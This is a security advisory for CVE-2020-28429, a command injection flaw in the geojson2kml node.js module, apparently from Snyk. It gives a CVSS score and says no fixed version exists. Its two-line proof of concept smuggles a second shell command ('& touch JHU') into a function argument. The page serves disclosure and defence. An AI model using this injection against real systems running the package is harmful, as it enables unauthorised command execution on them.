Do your applications use this vulnerable package?
Test your applications
Overview
geojson2kml is a node.js module for converting geojson to kml
Affected versions of this package are vulnerable to Command Injection via the index.js
file.
PoC:
var a =require("geojson2kml");
a("./","& touch JHU",function(){})
Remediation
There is no fixed version for geojson2kml
.
CVSS Score
9.8
high severity
-
Attack VectorNetwork
-
Attack ComplexityLow
-
Privileges RequiredNone
-
User InteractionNone
-
ScopeUnchanged
-
ConfidentialityHigh
-
IntegrityHigh
-
AvailabilityHigh
- Credit
- JHU System Security Lab
- CVE
- CVE-2020-28429
- CWE
- CWE-78
- Snyk ID
- SNYK-JS-GEOJSON2KML-1050412
- Disclosed
- 11 Dec, 2020
- Published
- 23 Feb, 2021